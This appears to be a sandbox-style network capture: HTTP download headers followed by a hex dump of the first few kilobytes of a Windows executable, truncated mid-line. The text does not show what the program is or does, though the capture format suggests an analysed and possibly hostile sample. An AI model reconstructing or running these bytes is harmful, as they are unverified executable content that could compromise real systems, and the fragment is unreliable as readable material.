                                                                                                                                                        ETag: "e5bd8a53623522c49ccc35bc492b5a11"
                                                                                                                                                        Expires: Wed, 28 Dec 2022 02:24:06 GMT
                                                                                                                                                        Last-Modified: Mon, 27 Dec 2021 21:59:31 GMT
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                        x-goog-generation: 1640642371383841
                                                                                                                                                        x-goog-hash: crc32c=mwF9kg==
                                                                                                                                                        x-goog-hash: md5=5b2KU2I1IsSczDW8SStaEQ==
                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                        x-goog-stored-content-length: 3624448
                                                                                                                                                        X-GUploader-UploadID: ADPycduw0w5hcBVS2VQwj415UE2nRQkehn2IgtC0_W7PDK9X6ZX9iEsQoVWrqGNwhFEYPKa8HRC0tAwTujxKmAeArUU
                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                        2021-12-28 02:24:06 UTC2382INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4b 61 25 32 46 7a 75 56 64 75 41 50 6c 7a 46 79 6d 76 44 71 4b 6f 4c 65 6e 77 6a 6a 59 69 47 39 42 61 49 74 73 51 37 61 55 37 6a 68 38 4c 74 64 49 36 7a 41 31 51 68 50 4b 34 38 31 39 59 4d 6e 67 55 78 74 74 45 79 6d 37 50 6c 41 39 6a 4f 33 6a 25 32 46 53 42 4c 4c 77 5a 53 63 4e 49 69 66 74 4f 56 67 62 76 58 49 73 32 79 73 4a 43 54 47 33 4b 77 62 6d 6d 4e 4f 4f 69 4b 79 69 62 75 64 47 65 34 4b 69 48 4c 56 76 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ka%2FzuVduAPlzFymvDqKoLenwjjYiG9BaItsQ7aU7jh8LtdI6zA1QhPK4819YMngUxttEym7PlA9jO3j%2FSBLLwZScNIiftOVgbvXIs2ysJCTG3KwbmmNOOiKyibudGe4KiHLVvg%3D%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                        2021-12-28 02:24:06 UTC2383INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 32 ff c9 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 20 02 00 00 cc 02 00 00 00 00 00 00 40 02 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 55 00 00 04 00 00 61 5d 37 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2a @@@Ua]7
                                                                                                                                                        2021-12-28 02:24:06 UTC2384INData Raw: 55 f2 3e 1e dc 78 0e 2a 82 94 0f 85 f0 8f ce a3 1a df 6d 7a a7 92 d2 78 65 8c 9a 83 d8 ec 83 d2 6d ce 8f 28 53 a1 3d 38 6d d7 19 cb ad 79 11 be 40 eb 11 f2 dd 26 ed 6b a5 8f 01 34 f2 60 96 4c 4d 9f 43 ba 5f 9e 0b 18 43 e4 31 e9 ee c5 77 ca d8 6c ea 0d 54 64 fa 19 cb ae a8 4d 5a 0e 59 71 c3 bc 13 77 2b f6 39 00 8d c1 89 8b 3b 0d e0 62 71 bb bd 8f 3e fa d5 44 63 9c b4 dd 9b 80 fe ff cd 5d 68 07 8f 80 0e 29 d3 0c 9a b6 8d 75 66 ae 5b 80 db a8 b4 cc b3 45 33 ba 0c 56 c3 aa 4d c5 6d a4 ad 96 ea 86 19 a3 5e 0b 23 e9 9b 44 05 38 46 0f 5e 86 2c c0 a3 00 d4 34 1b d5 30 c5 ae e1 85 48 ef 33 a6 98 75 ac 45 e9 2c 96 74 a2 62 3b f4 a4 74 73 40 20 5e 23 d0 ca ee e6 8b 3e a0 6c 1d b9 be 89 0e c5 66 21 c8 a3 a2 94 d3 b4 e6 d2 4d 25 d9 01 b0 1e 89 d2 0e db 40 b8 ca ee 2d
                                                                                                                                                        Data Ascii: U>x*mzxem(S=8my@&k4`LMC_C1wlTdMZYqw+9;bq>Dc]h)uf[E3VMm^#D8F^,40H3uE,tb;ts@ ^#>lf!M%@-
                                                                                                                                                        2021-12-28 02:24:06 UTC2385INData Raw: 20 34 97 a2 f8 4c 2f fa 43 84 af 7c f9 3d 38 fb 75 cd e6 e8 3d 64 4b 8d f7 df 81 c5 d9 ec cd 27 f9 73 fc 63 86 45 87 1f bf ce a8 44 c8 31 d3 29 ce f5 e5 95 c5 dd c0 cf 3a d0 8d b5 5c 1e 16 32 72 d5 45 9b 36 50 b4 ae 4c 56 2f cb e8 5a 46 ab 28 9f ed 3c c9 5f c0 72 e0 11 df dc 82 d6 19 a0 e4 36 4e 36 51 a6 28 a5 70 3d 59 26 6c 7a 57 5b a4 d5 f8 80 52 ee 45 c4 63 9c 98 90 8d d2 18 53 65 f4 0d 94 9d 7c 8f 43 51 fb 71 41 05 29 a1 da 84 38 fa 88 44 4b e6 af 4b cd a6 4e 38 17 c8 78 8c bc 18 c2 69 ce 27 0c 70 e3 5b d8 cb 62 41 cb 72 8c a5 cd 81 f5 12 28 ce 35 b3 ac 54 a8 ba 97 4d 42 89 1f 52 83 b1 bf 44 45 ae 8d c2 59 79 6b 28 2b 12 f4 9e 9b 89 9d c6 76 4d fd 05 de 00 24 26 e3 c5 4a d5 a2 da 4d ca 0d 1f cf ac 91 07 af 64 11 51 f3 07 28 72 88 72 22 f3 88 0e 9a de
                                                                                                                                                        Data Ascii: 4L/C|=8u=dK'scED1):\2rE6PLV/ZF(<_r6N6Q(p=Y&lzW[REcSe|CQqA)8DKKN8xi'p[bAr(5TMBRDEYyk(+vM$&JMdQ(rr"
                                                                                                                                                        2021-12-28 02:24:06 UTC2387INData Raw: 06 f2 ef e0 99 7d 58 20 6a 44 e8 9d 60 96 1f 0a 81 21 6a cc b9 b3 8f 27 05 46 49 29 ff 20 cf c0 c4 cd ef c6 7a 84 1c 14 28 0f 68 46 82 f7 32 46 53 f9 f2 13 4b 25 3b ca 84 00 35 26 e3 f3 87 19 fe db 37 12 99 08 64 b0 f8 4b fd 8b 84 57 89 5c 86 23 e5 61 35 03 0a e7 c6 a0 a2 a7 bf 36 2d 52 0b ef 53 44 ac c1 21 57 13 39 dc 61 9a a8 a5 df f5 49 d2 10 1d ac 77 cb f9 4a 99 b2 8e b1 15 1e 44 d9 8b c2 9c 27 a7 aa a9 b0 b9 62 55 a9 48 e3 84 68 ca cf 4d f1 4a ab 8d 40 7d d1 9d 70 62 5b cf ab 33 ba c0 38 77 30 e5 64 c6 c6 8c 08 55 81 57 4f 05 24 36 95 66 80 62 8b fb 60 c4 6e ca ec 0a ad fd 73 81 34 d6 44 2c 87 dd d4 52 c5 fc e3 85 2f 07 32 23 6f dd 0b d9 da 3f fd a7 b1 ea 89 18 c1 88 7e a9 06 fa a4 86 25 9f 6f 58 35 75 c1 e6 dc d8 2d 44 60 87 fa 0d b8 92 a4 ea cb 00
                                                                                                                                                        Data Ascii: }X jD`!j'FI) z(hF2FSK%;5&7dKW\#a56-RSD!W9aIwJD'bUHhMJ@}pb[38w0dUWO$6fb`ns4D,R/2#o?~%oX5u-D`
                                                                                                                                                        2021-12-28 02:24:06 UTC2388INData Raw: 84 5a 78 1a 7f 41 d2 6f 2b 3c d6 52 04 0d 97 b0 70 21 af 39 51 1c 34 00 f2 18 25 f3 7f 5c ad 9a a4 94 f8 57 7e 5e 87 34 09 a5 f3 38 29 ed 64 3a 38 f1 46 df 6e d8 13 0b 0c de c2 4a 31 74 46 26 b5 0a 3b 02 8b a8 2d 74 67 48 d2 e1 a8 c7 6c 58 1a 83 89 9a 98 cb 5a 88 14 33 0a e5 2c 82 3d 5d 8b 4b bf 4a 59 f3 83 f3 47 58 94 a5 d2 e5 98 14 69 b2 15 25 b3 b8 29 db 21 cd 47 aa 54 d3 c0 89 70 65 02 52 4a 37 b0 f3 3c 52 e5 b5 4a 19 d9 a1 bc 50 05 b6 ff 67 51 a8 21 28 c6 0e 86 b3 68 7b 84 05 db 1f 27 8e b5 26 05 b5 96 64 df ff 86 20 48 76 9b fe 77 07 00 ad 97 67 c7 a9 53 c0 72 41 2a e0 c5 8c 5f 39 61 08 d1 50 ef ae 7d ff ba 64 fd ea 21 eb 81 28 a7 be b0 65 d8 b9 4f f7 de 75 e1 9d 41 63 31 d7 81 66 8a b6 bf 8d eb 77 86 98 7c e3 a7 2c 44 5b c3 da 00 f9 fd c4 3e 6b 3b
                                                                                                                                                        Data Ascii: ZxAo+<Rp!9Q4%\W~^48)d:8FnJ1tF&;-tgHlXZ3,=]KJYGXi%)!GTpeRJ7<RJPgQ!(h{'&d HvwgSrA*_9aP}d!(eOuAc1fw|,D[>k;
                                                                                                                                                        2021-12-28 02:24:06 UTC2389INData Raw: 9d 32 f9 4d 0c d8 73 90 c5 70 b1 d2 55 03 8b 13 19 5a eb 5f 03 be c0 05 11 fe 0d f4 68 fc f9 b9 38 16 81 20 9f 2c 89 0c 51 96 e3 0d ba aa f6 0e 4a 7e 9d 1e 5f 19 a7 ea ce 61 44 b9 18 7b 0b fe 9b 34 90 77 7a f3 b7 15 22 c3 3a bd 2c 9a 6f 42 51 65 33 6b 0d af 9e f9 13 b4 03 41 61 37 c4 78 09 8e aa de 96 71 48 fd bf 9a 46 78 21 7e 97 84 71 3e c2 11 6e 1d 75 cd 78 95 a0 31 34 73 45 76 df bb c5 e7 25 47 20 48 ae 58 d8 12 07 67 a6 f3 e6 35 75 72 73 e8 a1 07 7f 87 17 89 7c 1f e1 e3 a8 24 81 ff d7 45 30 ad 0d 01 43 63 24 a7 8b e9 ee af cb f3 be b5 8d 8a e6 f5 93 1b bd 42 f4 99 a0 18 57 2c b3 a2 3a 91 68 be 17 86 f0 2e c1 e9 76 85 a4 aa 1d a2 57 79 a4 56 8e b6 9b 33 4e fc 8f b4 7d 51 23 f4 93 da 32 af 34 f4 67 de fb 0f 41 63 82 ce fa de e7 18 70 7e d6 e2 af 89 17
                                                                                                                                                        Data Ascii: 2MspUZ_h8 ,QJ~_aD{4wz":,oBQe3kAa7xqHFx!~q>nux14sEv%G HXg5urs|$E0Cc$BW,:h.vWyV3N}Q#24gAcp~
                                                                                                                                                        2021-12-28 02:24:06 UTC2391INData Raw: 6a 97 91 3f 5d 62 b7 07 f5 11 ab ce 69 30 a3 7b 85 41 c0 74 a5 2f 71 7e 44 d1 ca 35 06 59 5d 01 c4 f7 a8 68 24 35 04 99 08 0f 67 ec ff 91 35 5d a0 6f 90 f4 0f f3 a9 86 19 e5 1c 43 47 22 56 c8 92 7e 8f 0f 40 0d 70 e0 aa 70 01 91 aa 3a 80 32 42 9e 17 ae 5a bf e7 e0 ad c1 55 c0 06 4e 36 29 5a 13 1e bf 8e 2e fc 2e 13 77 f5 d1 4c ac e2 29 c8 72 5a 9d 48 a1 69 96 9d f3 10 e7 53 57 b8 aa b6 5d 28 ab b8 63 c5 62 d6 e2 4f ec 97 12 ac 4a 4c 1f 6e bc 31 41 8d e5 e0 c2 9b d5 06 0b 15 56 e5 c9 7c a9 79 77 9f 40 39 99 8c 80 aa a7 57 04 fb f4 37 07 50 3e 70 9a 16 98 f7 54 97 0a 86 f2 a1 8d 6b 13 ef 6b ce 7b 98 3c bd d7 b7 56 0d 00 b3 46 7d 75 6c f0 c0 98 ad b9 13 6d 37 f2 9f 35 2b f2 da 23 2c e0 45 f5 f9 52 c6 64 d8 99 72 14 32 cc ea 90 98 30 7a a2 cf 34 34 48 ae 4e ef
                                                                                                                                                        Data Ascii: j?]bi0{At/q~D5Y]h$5g5]oCG"V~@pp:2BZUN6)Z..wL)rZHiSW](cbOJLn1AV|yw@9W7P>pTkk{<VF}ulm75+#,ERdr20z44HN
                                                                                                                                                        2021-12-28 02:24:06 UTC2392INData Raw: 66 79 1a 89 61 10 a1 f0 1f f7 3d 18 26 94 37 41 40 1a 92 80 06 d7 e6 90 87 ae 7e 1a c4 0a 6e 04 21 be 5e 53 08 d6 d8 bb e9 75 69 a4 6a c7 fa 75 7b 41 1a 6d 43 3f f1 e3 eb 7f 89 fe 63 43 d5 a7 03 55 5b f2 2e b6 48 0b f9 54 04 5b 5c c6 21 9e 39 b0 41 b7 f0 ea 5b 3d b3 d6 5a 6d bf e7 a0 b0 de 63 8a b8 c2 df 2a cb a3 a0 d8 91 3d 09 94 8f 39 ad a6 de 03 c2 3b 1a f3 d3 99 24 c2 de 47 85 60 e0 21 7a 8c 2c 0a 34 b2 63 d2 36 e5 d9 4b 48 0c 3b a2 21 8e 05 3b 50 66 99 5d 8a 89 51 42 6b 0f d1 52 df e6 98 f7 da 80 df c4 88 8c c0 25 83 7a b1 b8 2e 4b 0d 71 22 65 40 20 95 9a 97 d0 7e 33 08 95 87 0f e2 b8 8f 4b 2e 4e 2b cd 07 26 5f 0e 37 ca b1 6a 53 20 43 29 1b a3 9d ab 6c 10 bf 77 3b f3 ac 4c b0 42 93 d2 83 0b 94 a3 64 a7 ff 9c 44 9d 3a 7d 0e f0 43 7d 47 e2 91 ba d4 c7
                                                                                                                                                        Data Ascii: fya=&7A@~n!^Suiju{AmC?cCU[.HT[\!9A[=Zmc*=9;$G`!z,4c6KH;!;Pf]QBkR%z.Kq"e@ ~3K.N+&_7jS C)lw;LBdD:}C}G
                                                                                                                                                        2021-12-28 02:24:06 UTC2393INData Raw: 12 82 3a 58 b6 0f c2 3c 80 42 64 69 4c b8 d2 55 dc 21 84 5c 0c f0 76 ad 9a 96 53 73 be fb bf 08 79 29 34 a0 49 c5 6c fd 6f dd ba 02 a8 66 59 78 00 28 ce c8 92 0c 20 27 e6 9e 2c 26 cb c0 de 83 6e c6 72 43 29 c1 a2 9a bf e8 73 50 e2 33 b3 22 f5 cb fc 03 5c 9e 15 a0 7b 55 05 66 30 a5 3b 98 5e 37 95 29 09 d8 d0 85 39 e5 e4 8a cd d1 29 d9 54 cb dd 6e cd 3f 77 98 29 30 f3 a5 e8 8b d8 15 08 1c 17 1c 85 cb 36 83 63 0d f7 dd dd 7a 30 ea fc eb 38 7c 90 31 bf a3 61 be 23 9e dd b2 e9 a3 75 3b 47 d8 83 52 37 1e 60 bf f5 b6 c2 a3 74 ec 22 df 2c 00 ab 1c 8b 54 7b 41 2d 03 cc c6 11 2e 1d 8e d5 7e 21 23 9a b7 e5 37 b6 11 d0 d8 56 60 ce 31 1a a5 ef 36 cd ec de f5 74 dc bb 38 4d fc a1 66 14 fe 81 f9 e3 53 69 17 6a 3b 2f a1 6e ae 20 91 65 59 da cd e7 65 04 f9 67 96 2b ba 75
                                                                                                                                                        Data Ascii: :X<BdiLU!\vSsy)4IlofYx( ',&nrC)sP3"\{Uf0;^7)9)Tn?w)06cz08|1a#u;GR7`t",T{A-.~!#7V`16t8MfSij;/n eYeg+u
                                                                                                                                                        2021-12-28 02:24:06 UTC2395INData Raw: 96 5c f2 60 5b d3 43 04 df 42 56 27 1e cc f1 d6 46 fe a3 2d 41 8b de c9 8a 52 37 82 26 03 a6 ae de f1 fc 6d 62 7c 59 3a ef 8c 4f 94 f3 78 ba 63 7d 74 9b 16 01 3a 39 91 e2 fc 90 de ab 78 05 b1 89 42 d5 cd a3 1a 36 c8 60 53 e2 f1 21 93 df fe f1 d1 fa 75 bd 0a 51 79 62 43 ec 8a 2c 52 b4 d9 80 83 5b 98 f8 2f 27 a3 82 1d b0 dd ea e5 bb b2 15 b3 24 0a 70 ef 11 34 82 9c f5 e4 69 dd fe 51 02 28 be 86 49 97 8b 70 1e 2d 23 b1 8e 92 8f ff f9 39 93 4d 3f 97 d8 da 0f 5d a1 75 9c 4b 86 f2 71 04 37 ba d5 2a 26 90 6f 37 ed 37 c0 25 a7 bb 6f 08 fa 02 3a 67 c2 7f b3 12 92 18 f5 7f 88 53 0e b7 bd 0d 23 82 d9 f5 0c c7 c4 45 ef db 05 11 d2 47 c5 e5 63 03 81 4a ee e6 27 ea 11 12 17 1b a2 0d a1 3f e8 a7 22 e7 9e 25 32 75 1e fd fe 32 de 0b 38 2d 51 52 27 52 92 12 91 a6 79 0b c2
                                                                                                                                                        Data Ascii: \`[CBV'F-AR7&mb|Y:Oxc}t:9xB6`S!uQybC,R[/'$p4iQ(Ip-#9M?]uKq7*&o77%o:gS#EGcJ'?"%2u28-QR'Ry
                                                                                                                                                        2021-12-28 02:24:06 UTC2396INData Raw: 96 9e e8 69 10 1c 69 02 ad 37 04 97 38 d7 1b 1d 4a 43 28 fd 57 2f 21 b1 f8 da 56 76 dc 4d cd 7c 2a 49 4b 5f 57 68 08 b9 73 7f ff 4e d2 25 d4 07 84 69 16 00 12 83 94 6b 6c f7 a1 1f 4c 92 0e 00 8b 7f ef 9a 64 0d 0e 3a 42 8d 19 cf e3 e6 d2 a1 f6 ee ab 48 8e 4e 9b b4 f9 e6 c3 1b 23 ce 68 f9 8d 6a 69 d7 34 7f 24 bb 6b 87 d2 f8 d3 e0 8c 6e d2 90 86 7c bc 45 11 9d 70 5d 1f a8 d5 f5 65 0b d9 b6 8a 26 ca 8f 80 f6 91 78 49 f3 5b 14 f6 94 a0 f7 c1 c7 f6 ad d1 ba 57 8b de 65 46 60 16 61 6e de 62 f9 c7 f1 21 36 3f 94 38 1c f0 51 9f 1c 31 bd 3d c7 af 55 f2 8f cd 05 b6 f9 69 11 d6 1b 5e 36 14 d6 a5 09 04 b6 85 27 6f 22 03 80 ff 95 9a 05 22 70 51 5a 04 e8 63 66 98 5e a2 fc 8f 66 5a 3d 94 e3 80 c7 06 d0 4f a0 54 d6 5c 02 e7 2d 41 fa 3b b5 b3 5d d0 73 09 16 a6 d3 a0 15 12
                                                                                                                                                        Data Ascii: ii78JC(W/!VvM|*IK_WhsN%iklLd:BHN#hji4$kn|Ep]e&xI[WeF`anb!6?8Q1=Ui^6'o""pQZcf^fZ=OT\-A;]s
                                                                                                                                                        2021-12-28 02:24:06 UTC2397INData Raw: e3 74 78 f2 35 a6 48 4c 39 fb c9 e9 ae 50 df 72 b0 e4 d0 d1 4a 8c a3 72 e7 55 e1 ca 6b 5b 58 b9 7a 68 f9 59 ab 45 d3 98 f5 f2 5c 22 cd 89 aa a7 49 99 0d c3 e0 7f dd ea 8d f0 31 d2 54 46 46 9f bc d5 90 c6 a7 93 04 74 32 79 c8 85 41 1f f6 97 87 1e c0 9c e5 63 7c f2 4e 65 f5 90 82 bf 03 3a e4 cc 07 e8 d6 1a 9e 65 14 43 a4 c9 38 a7 d4 84 1c f8 ba d0 eb 99 41 2c 92 21 2b 1a d8 3d be e0 a9 5b f5 f8 75 c1 1b a2 b1 c5 e6 db e8 f1 9a c0 1b dc e2 47 ac 37 43 03 c9 c2 59 1e bf 99 3f c4 c7 30 83 5a 0c e5 76 f4 11 4d 74 c7 c5 10 2d 7d a9 c3 71 b2 cf 86 54 d2 81 b7 99 02 41 f5 f3 25 51 19 07 c1 42 0c 39 66 d2 ed 8f 5e cb c2 3a b0 bb 6a 81 77 21 d9 b8 04 49 8c 2f 99 ea 69 4e ab f6 59 f1 5a 27 06 12 89 04 12 b3 7e 2e 06 0b 00 a4 a9 84 c9 c3 26 a0 a4 d4 4c 98 f7 8f a0 17
                                                                                                                                                        Data Ascii: tx5HL9PrJrUk[XzhYE\"I1TFFt2yAc|Ne:eC8A,!+=[uG7CY?0ZvMt-}qTA%QB9f^:jw!I/iNYZ'~.&L
                                                                                                                                                        2021-12-28 02:24:06 UTC2399INData Raw: 04 f6 dd 99 15 cc 89 ee 8c 1f 76 a0 86 06 04 b4 ed d3 98 d0 3e fb de 88 1a 0f 73 1f b3 fa 00 81 2d e9 32 98 c2 62 bc db 6b 28 9f 82 3f ed e2 b7 6c 4f aa fb 3b d5 80 24 27 17 f0 a3 88 55 05 f2 3c c8 a8 da 1f bc a6 21 42 98 93 24 d9 4b 32 db d8 7a 25 79 43 b2 da 35 9e c7 40 18 6c 35 41 bd db 68 ff 41 53 f3 15 61 d2 db 94 7d 03 ba 44 9b a0 ca e9 ae 98 c0 34 69 41 f4 94 a9 90 9c b7 7b ce 0c 42 1f 6b ea 7e ce 63 32 79 f0 bd 48 61 60 7f 8b c9 24 f3 5e 1a aa fe 72 02 9d 95 cd 4e e8 bf b9 c8 37 37 f6 7c 2e 12 fd b9 b6 73 d9 95 f9 e6 3e 58 8e 56 e1 ac df 11 f9 3c f0 98 2a 6a 95 e8 14 6a 3a e9 2d 6b d3 44 0b 6a 7d 04 b2 47 1f 20 67 c4 08 ac 0c fe 6c d0 2d 76 d2 b4 c6 ed bd 22 f1 bc 4a 86 eb 26 c2 fa cb 26 a0 eb 10 d5 0d 25 72 99 45 3d f2 a4 3a fb d8 f5 7a 7f 37 51
                                                                                                                                                        Data Ascii: v>s-2bk(?lO;$'U<!B$K2z%yC5@l5AhASa}D4iA{Bk~c2yHa`$^rN77|.s>XV<*jj:-kDj}G gl-v"J&&%rE=:z7Q
                                                                                                                                                        2021-12-28 02:24:06 UTC2400INData Raw: 22 f6 9b b3 ff ec bb d0 11 09 8a 45 fd 06 26 ed d2 97 53 ad 0c 43 97 f6 be 7a 24 c6 6e 8f 97 31 9b fb cb 82 1a 90 dc d3 cc 94 a4 39 2a ba ab 12 c7 a4 ff 16 55 f1 5d 7e 0c 0a e9 db 1f 43 52 d7 b0 12 ea 59 46 3b a9 ee a3 81 ee 1b ac 82 bb 93 d5 ce d8 8c 9e 15 d4 18 4c a4 32 3f ce dc 5b b4 3b 82 f7 f1 1e 85 dd ca 78 6d c0 7e c3 03 0c e0 b5 f6 fc 77 30 d4 a1 cd be 1f 75 eb 98 68 f4 45 94 4d b0 70 de c0 ea aa 59 1f d2 92 bb f9 f6 22 3e 2b 81 32 2e f0 27 66 5b 6a 5d 3b 74 48 85 25 b9 56 c7 d4 c3 a1 b9 59 8e ee ef 17 57 29 25 b8 f3 ce 65 36 aa d3 bf 4f 65 e3 45 17 0d 3e da 45 8f b3 84 db cd cc c6 e0 0f 3f 78 8e 2c b8 71 70 61 8f 63 f1 51 68 9f 38 d8 89 ff 10 58 ee 79 36 4f 3f 63 2b d0 e7 ff 42 bb 31 f2 0e 40 0d 75 ae 59 ca 04 02 c5 91 63 dd b2 c6 d1 a0 b1 c5 b9
                                                                                                                                                        Data Ascii: "E&SCz$n19*U]~CRYF;L2?[;xm~w0uhEMpY">+2.'f[j];tH%VYW)%e6OeE>E?x,qpacQh8Xy6O?c+B1@uYc
                                                                                                                                                        2021-12-28 02:24:06 UTC2401INData Raw: a5 a3 14 fb 4f 05 57 b1 3e 36 d9 5e 97 77 4f fa 49 9f b0 4a 4a b4 96 f4 5c 86 00 e9 1f f9 c3 63 7c 43 53 59 fd 94 9e 59 f5 34 d0 ed 59 ce 93 dc 97 55 cb c8 78 0e 08 56 45 8e cc 63 28 07 03 af fd fb 72 f7 af 8e aa cc 0f a8 d7 75 08 5b 73 8f 2f ad 1b 53 f3 7a 36 9b c5 89 44 f9 ff c7 1b 47 d5 18 f2 61 52 74 5b c5 96 0a 85 b6 33 0a cf ed 03 56 61 85 55 ed c4 c0 0f 01 89 8f 46 1d 32 e8 fc cc bc 43 93 01 4b ec fa 15 7f 18 2d d4 43 b5 fa 0e 71 76 80 91 a1 45 78 dd cd be e7 26 a1 8f 6b 48 ba bb 0f c9 88 29 b0 97 6b 90 45 69 d4 f7 97 5b 30 95 08 7d 55 cf 2f e1 d0 cf 76 86 1d cd 7d d3 e6 d4 40 eb 1f c0 c6 78 59 3a 45 d5 21 2a 4b e0 80 aa 95 3b f9 fb 13 7b e4 91 73 7c 15 fc 67 95 76 e9 af 3e 1f 7c 50 1e 65 23 0a 42 95 20 3e 03 ac f4 c4 4d 42 73 56 b4 76 b8 c9 da d5
                                                                                                                                                        Data Ascii: OW>6^wOIJJ\c|CSYY4YUxVEc(ru[s/Sz6DGaRt[3VaUF2CK-CqvEx&kH)kEi[0}U/v}@xY:E!*K;{s|gv>|Pe#B >MBsVv
                                                                                                                                                        2021-12-28 02:24:06 UTC2403INData Raw: 26 2a 31 0b c2 5e e2 53 f7 02 de 63 1e 68 71 e4 ef a6 9a 39 61 92 3d 0b bf d0 24 bd 7c dc 6f 62 49 37 87 0f ec dc bd 95 1b fd 89 03 ea 5d b9 28 a8 8a 70 63 71 3f 1e 69 ad fd 70 c1 f8 a0 2c 4e f7 a0 84 95 67 d5 a1 2e 52 6d 3f 0e be c9 84 b5 ad 26 38 e8 48 65 00 48 d5 c4 61 b4 4e 3d 26 c2 13 3f ba 9d 9d dc e8 ea 41 18 16 c2 f6 b2 39 aa b9 fd e9 3b 42 ff be 32 67 2c f7 73 e9 ba 45 31 4c 0e ff df 05 10 04 0c 47 60 ad 58 f8 b7 85 84 b4 17 f7 4b e8 df 1d 56 ce a3 d6 95 07 66 17 82 d0 db 56 12 46 07 8a 29 c4 1f db 28 f0 8a 2f 79 48 18 92 06 d8 f3 71 5e ed 74 b7 77 f4 f2 a1 28 53 64 0b bf e4 d2 c7 29 27 a3 29 59 61 e6 e8 ed cc 58 8f 35 21 ad 72 f4 af fb fd 88 58 c5 c2 1e 51 7d 01 83 a8 55 fc 91 87 0c 76 c6 0d 13 b6 e0 2c 41 98 fa d2 29 88 3f 79 99 54 58 f1 4c a6
                                                                                                                                                        Data Ascii: &*1^Schq9a=$|obI7](pcq?ip,Ng.Rm?&8HeHaN=&?A9;B2g,sE1LG`XKVfVF)(/yHq^tw(Sd)')YaX5!rXQ}Uv,A)?yTXL
                                                                                                                                                        2021-12-28 02:24:06 UTC2404INData Raw: b2 bb 95 54 dd 9f 16 cb e7 d6 48 69 0d 6b 03 c6 eb 03 65 0c d5 bc 24 fb c9 2e dd 6c f4 4b a3 fb bb ae 4c 52 73 7b c3 6c 4e 19 a3 b7 15 22 3a f4 ec ca 8a 09 56 12 ff a6 19 7b 30 d8 3a 5f 6d 64 a6 9d b3 c2 91 b3 29 0a 6f 79 d5 4a cb 8e ba 36 6b bb d7 ec d6 78 f9 cc e4 80 f7 bc 5e e8 b8 4c f6 72 f3 2a 53 f4 ab 36 68 9a 00 0a ee da 55 53 77 d3 93 a2 44 db d6 7b 2e eb ec 76 13 c3 fb bf 12 51 7a d6 99 0f 27 ee 86 27 05 7e 80 cd b9 43 ea 18 65 3d f0 b2 78 0e 5e 4e c5 18 ff 12 d1 ef b5 81 fb ad 72 6a 96 95 b9 fb cb 6b 68 4e 98 57 5d 15 fb 65 b4 3c 90 ea 49 52 d1 15 08 92 e6 c2 f0 13 3a f6 22 dd 62 f0 42 8b 19 0f 84 02 01 c2 5b 23 54 6f ae 7f 37 6a 3c 10 53 b3 72 23 28 c5 87 8f 11 f2 bf 9a ca 36 c6 74 d7 fd 55 8c d4 6e 70 be 8f 21 e7 d3 37 b1 46 90 7d d6 82 bd 82
                                                                                                                                                        Data Ascii: THike$.lKLRs{lN":V{0:_md)oyJ6kx^Lr*S6hUSwD{.vQz''~Ce=x^NrjkhNW]e<IR:"bB[#To7j<Sr#(6tUnp!7F}
                                                                                                                                                        2021-12-28 02:24:06 UTC2405INData Raw: 4a 7b 15 d5 10 f0 88 ab fe 0b 21 66 cf d8 01 dd 0e 0d 56 4c 98 ac a2 12 f0 e8 74 cc 7c 97 8e 93 b9 03 f1 d7 84 97 f8 19 76 65 36 8f 34 9a 16 24 db d4 d5 74 5a 65 e9 c8 af 17 b1 8f c2 86 a4 ca e2 d2 fa e2 f5 dc 45 b2 6c 45 05 62 05 96 03 11 e9 bb 2c 2e 18 1a d5 e3 eb 4c 78 54 6d c6 24 1a 69 9c a8 dd b6 6a 3d 75 4b 19 3f 56 b3 a4 98 3b f6 10 67 e1 2a 7c db 64 7c 11 0a ee f4 84 c8 7e 5a 1c ef ee 6c 72 32 e6 f0 17 83 e4 0c ab 03 ee 81 34 8c bc 58 d6 a6 c9 d0 93 33 3f e4 7d 73 63 5d cb 78 d9 e4 f4 1f a1 d3 e9 36 62 aa 1b 6b 08 da 0f ef a4 2b 28 3c fb 3b b3 68 ac 26 c9 74 7f 29 3b 5e 48 27 2b 8c 81 a7 d2 91 a2 30 8d e2 d9 b4 cf 82 0f f2 81 6a 86 e6 bf cb ae 55 97 34 44 76 e3 d2 2e 